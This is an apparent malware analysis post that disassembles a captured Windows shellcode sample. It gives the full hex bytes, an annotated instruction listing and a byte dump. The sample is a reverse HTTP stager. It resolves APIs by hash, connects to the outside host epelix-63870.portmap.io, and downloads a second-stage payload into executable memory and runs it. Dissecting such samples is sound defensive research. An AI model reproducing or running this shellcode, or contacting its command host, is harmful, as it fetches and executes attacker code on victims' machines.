shellcode disasm
## uploaded by @JohnLaTwC
https://www.virustotal.com/en/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/analysis/
https://docs.microsoft.com/en-us/windows/desktop/api/wininet/nf-wininet-internetconnecta
void InternetConnectA(
HINTERNET hInternet,
LPCSTR lpszServerName,
INTERNET_PORT nServerPort,
LPCSTR lpszUserName,
LPCSTR lpszPassword,
DWORD dwService,
DWORD dwFlags,
DWORD_PTR dwContext
);
Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 68 7e f9 00 00 e8 b0 00 00 00 2f 67 53 4d 37 34 54 51 53 41 30 75 51 7a 70 48 50 79 7a 62 38 70 41 33 70 2d 32 59 6d 33 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 65 70 65 6c 69 78 2d 36 33 38 37 30 2e 70 6f 72 74 6d 61 70 2e 69 6f 00
0x00000000 fc cld
0x00000001 e882000000 call 0x00000088
0x00000006 60 pushad
0x00000007 89e5 mov ebp,esp
0x00000009 31c0 xor eax,eax
0x0000000b 648b5030 fs: mov edx,dword [eax + 48]
0x0000000f 8b520c mov edx,dword [edx + 12]
0x00000012 8b5214 mov edx,dword [edx + 20]
0x00000015 8b7228 mov esi,dword [edx + 40]
0x00000018 0fb74a26 movzx ecx,word [edx + 38]
0x0000001c 31ff xor edi,edi
0x0000001e ac lodsb
0x0000001f 3c61 cmp al,97
0x00000021 7c02 jl 0x00000025
0x00000023 2c20 sub al,32
0x00000025 c1cf0d ror edi,13
0x00000028 01c7 add edi,eax
0x0000002a e2f2 loop 0x0000001e
0x0000002c 52 push edx
0x0000002d 57 push edi
0x0000002e 8b5210 mov edx,dword [edx + 16]
0x00000031 8b4a3c mov ecx,dword [edx + 60]
0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120]
0x00000038 e348 jecxz 0x00000082
0x0000003a 01d1 add ecx,edx
0x0000003c 51 push ecx
0x0000003d 8b5920 mov ebx,dword [ecx + 32]
0x00000040 01d3 add ebx,edx
0x00000042 8b4918 mov ecx,dword [ecx + 24]
0x00000045 e33a jecxz 0x00000081
0x00000047 49 dec ecx
0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
0x0000004b 01d6 add esi,edx
0x0000004d 31ff xor edi,edi
0x0000004f ac lodsb
0x00000050 c1cf0d ror edi,13
0x00000053 01c7 add edi,eax
0x00000055 38e0 cmp al,ah
0x00000057 75f6 jnz 0x0000004f
0x00000059 037df8 add edi,dword [ebp - 8]
0x0000005c 3b7d24 cmp edi,dword [ebp + 36]
0x0000005f 75e4 jnz 0x00000045
0x00000061 58 pop eax
0x00000062 8b5824 mov ebx,dword [eax + 36]
0x00000065 01d3 add ebx,edx
0x00000067 668b0c4b mov cx,word [ebx + ecx * 2]
0x0000006b 8b581c mov ebx,dword [eax + 28]
0x0000006e 01d3 add ebx,edx
0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
0x00000073 01d0 add eax,edx
0x00000075 89442424 mov dword [esp + 36],eax
0x00000079 5b pop ebx
0x0000007a 5b pop ebx
0x0000007b 61 popad
0x0000007c 59 pop ecx
0x0000007d 5a pop edx
0x0000007e 51 push ecx
0x0000007f ffe0 jmp eax
0x00000081 5f pop edi
0x00000082 5f pop edi
0x00000083 5a pop edx
0x00000084 8b12 mov edx,dword [edx]
0x00000086 eb8d jmp 0x00000015
0x00000088 5d pop ebp
0x00000089 686e657400 push 0x0074656e--> 'ten'
0x0000008e 6877696e69 push 0x696e6977--> 'iniw'
0x00000093 54 push esp
0x00000094 684c772607 push 0x0726774c--> '&wL'
0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
0x0000009b 31db xor ebx,ebx
0x0000009d 53 push ebx
0x0000009e 53 push ebx
0x0000009f 53 push ebx
0x000000a0 53 push ebx
0x000000a1 53 push ebx
0x000000a2 683a5679a7 push 0xa779563a--> 'yV:'
0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA
0x000000a9 53 push ebx
0x000000aa 53 push ebx
0x000000ab 6a03 push 3
0x000000ad 53 push ebx
0x000000ae 53 push ebx
0x000000af 687ef90000 push 0x0000f97e
0x000000b4 e8b0000000 call 0x00000169
0x000000b9 2f das <-- start of url path string "/gSM74TQSA0uQzpHPyzb8pA3p-2Ym3" (the bytes from here up to the NUL at 0xd7 are ASCII data, not real instructions; see the byte dump below)
0x000000ba 6753 push ebx
0x000000bc 4d dec ebp
0x000000bd 37 aaa
0x000000be 3454 xor al,84
0x000000c0 51 push ecx
0x000000c1 53 push ebx
0x000000c2 41 inc ecx
0x000000c3 307551 xor byte [ebp + 81],dh
0x000000c6 7a70 jpe 0x00000138
0x000000c8 48 dec eax
0x000000c9 50 push eax
0x000000ca 797a jns 0x00000146
0x000000cc 6238 bound edi,dword [eax]
0x000000ce 7041 jo 0x00000111
0x000000d0 33702d xor esi,dword [eax + 45]
0x000000d3 32596d xor bl,byte [ecx + 109]
0x000000d6 3300 xor eax,dword [eax]
0x000000d8 50 push eax
0x000000d9 6857899fc6 push 0xc69f8957
0x000000de ffd5 call ebp --> wininet.dll!InternetConnectA
0x000000e0 89c6 mov esi,eax
0x000000e2 53 push ebx
0x000000e3 680032e084 push 0x84e03200
0x000000e8 53 push ebx
0x000000e9 53 push ebx
0x000000ea 53 push ebx
0x000000eb 57 push edi
0x000000ec 53 push ebx
0x000000ed 56 push esi
0x000000ee 68eb552e3b push 0x3b2e55eb--> ';.U'
0x000000f3 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
0x000000f5 96 xchg eax,esi
0x000000f6 6a0a push 10
0x000000f8 5f pop edi
0x000000f9 6880330000 push 0x00003380
0x000000fe 89e0 mov eax,esp
0x00000100 6a04 push 4
0x00000102 50 push eax
0x00000103 6a1f push 31
0x00000105 56 push esi
0x00000106 6875469e86 push 0x869e4675--> 'Fu'
0x0000010b ffd5 call ebp --> wininet.dll!InternetSetOptionA
0x0000010d 53 push ebx
0x0000010e 53 push ebx
0x0000010f 53 push ebx
0x00000110 53 push ebx
0x00000111 56 push esi
0x00000112 682d06187b push 0x7b18062d--> '{-'
0x00000117 ffd5 call ebp --> wininet.dll!HttpSendRequestA
0x00000119 85c0 test eax,eax
0x0000011b 7516 jnz 0x00000133
0x0000011d 6888130000 push 0x00001388
0x00000122 6844f035e0 push 0xe035f044--> '5D'
0x00000127 ffd5 call ebp --> kernel32.dll!Sleep
0x00000129 4f dec edi
0x0000012a 75cd jnz 0x000000f9
0x0000012c 68f0b5a256 push 0x56a2b5f0
0x00000131 ffd5 call ebp --> kernel32.dll!ExitProcess
0x00000133 6a40 push 64
0x00000135 6800100000 push 4096
0x0000013a 6800004000 push 0x00400000
0x0000013f 53 push ebx
0x00000140 6858a453e5 push 0xe553a458--> 'SX'
0x00000145 ffd5 call ebp --> kernel32.dll!VirtualAlloc
0x00000147 93 xchg eax,ebx
0x00000148 53 push ebx
0x00000149 53 push ebx
0x0000014a 89e7 mov edi,esp
0x0000014c 57 push edi
0x0000014d 6800200000 push 0x00002000
0x00000152 53 push ebx
0x00000153 56 push esi
0x00000154 68129689e2 push 0xe2899612
0x00000159 ffd5 call ebp --> wininet.dll!InternetReadFile
0x0000015b 85c0 test eax,eax
0x0000015d 74cd jz 0x0000012c
0x0000015f 8b07 mov eax,dword [edi]
0x00000161 01c3 add ebx,eax
0x00000163 85c0 test eax,eax
0x00000165 75e5 jnz 0x0000014c
0x00000167 58 pop eax
0x00000168 c3 ret
0x00000169 5f pop edi
0x0000016a e869ffffff call 0x000000d8
0x0000016f 657065 gs: jo 0x000001d7 <-- start of domain string "epelix-63870.portmap.io" (the bytes from here to the end are ASCII data, not real instructions; see the byte dump below)
0x00000172 6c insb byte [esi],edx
0x00000173 69782d36333837 imul edi,dword [eax + 45],0x37383336
0x0000017a 302e xor byte [esi],ch
0x0000017c 706f jo 0x000001ed
0x0000017e 7274 jc 0x000001f4
0x00000180 6d insd dword [esi],edx
0x00000181 61 popad
0x00000182 702e jo 0x000001b2
Byte Dump:
......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSh~......../gSM74TQSA0uQzpHPyzb8pA3p-2Ym3.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{....u.h....hD.5...Ou.h...V..j@h....h..@.ShX.S....SS..Wh...SVh........t.......u.X._.i...epelix-63870.portmap.io.